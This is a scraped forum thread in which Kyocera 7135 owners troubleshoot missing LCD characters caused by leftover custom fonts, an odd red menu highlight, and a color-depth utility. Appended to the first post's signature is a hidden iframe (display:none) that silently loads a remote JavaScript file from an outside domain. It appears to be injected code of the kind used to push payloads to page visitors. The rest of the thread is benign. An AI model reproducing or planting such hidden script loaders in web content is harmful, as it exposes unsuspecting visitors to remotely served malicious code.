+ Reply to Thread
    Mostly Converged

Missing characters on LCD display?

On my Verizon supplied 7135, the top LCD Display is not showing several characters, and the font is really small. At the RSA Conference in San Francisco, I ran into some Kyocera Techs there and they had never seen it, so before I get a phone swap, has anyone else seen this?

Specifically 'n', 'N', 'T' are replaced with a Square, so when you dial a number you get 'Diali[]g...' and when a Tom Nunne calls you get '[]om []u[][]e' Neat huh!

Scott<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Are you using any application that makes use of custom fonts? I noticed on mine that Palm Reader's custom font is applied to the LCD display. Perhaps yours is caused by something similar.

I have just found a similar situation today for the first time. On the main phone screen, the word Messages under the main menu item has a box character instead of the first 'S' in the word Messages. I had to do a soft reset to get rid of it. The only new app I've installed today is TAKEphONE. I have no fonts added.

Talking of the Phone screen, there's been a lot of talk about why Kyocera didn't make this touch sensitive for stylus use. I'm wonderinf if that was deliberate so that when you're talking on the phone with the screen almost hitting your face, you can't accidentally cause an action to occur should part of your face touch the screen. Just a thought.

Mostly Converged
    On my 7135, I don't have any special fonts loaded (I don't think), the only hackmaster hacks I have are EnergyDimmer, SwitchHack, and BatteryHack.

I do have Font Bucket from the Kyocera CD installed, but not done anything with it.

I check with BeamPro and I had some old fonts installed from the transfer from my 6035, so I removed them, and did a soft reset, and things look saner.

Thanks.

Scott

Originally posted by sck_nogas
    I do have Font Bucket from the Kyocera CD installed, but not done anything with it.
    Font Bucket on the CD? I just got my 7135 a couple days ago, there is no Font Bucket on the included CD that I can find.

Mostly Converged
    It's part of QuickOffice I think

http://www.handshigh.com/fontbucket/

Scott

Originally posted by sck_nogas
    It's part of QuickOffice I think

http://www.handshigh.com/fontbucket/

Scott
    According to them, it only works with apps that specifically include support for Fontbucket, and I'm not using any of the listed apps. I'd be wanting to use a more generic font enhancer, so long as it doesn't at the same time make the external LCD unreadable.

Main menu Red not Blue??

Okay, didn't know where this belonged! Anybody else ever seen this?

On the phone main menu, where the options (recent calls, phone number, etc.) would normally be hi-lighted in blue, they are sometimes randomly in a dark red instead.

What's that all about?

Beth

Mostly Converged
    Me thinks, that you are running an Application like BookWorm, or other games/apps that change the color map. So, when the Phone application starts (or is switched to) it doesn't change the color map back. Try swithcing to datebook and then phone, does the color look normal now?

Scott

Hmm. I'll try that next time and see. It's just hanging out on the charger now.....

(However, you are talking to a girl of relatively few and simple apps.) Making it all the more perplexing.

Beth

There is also a program available to manually change the color depth called Toggle:

http://www.ardiri.com/index.php?redi...ubcat=download

I haven't tested it yet, but it appears to support a lot of palms and it comes with the source code so it if doesn't work somebody could MAKE it work for the 7135.

Hope this helps

Steve
    iPhone therefore iAm.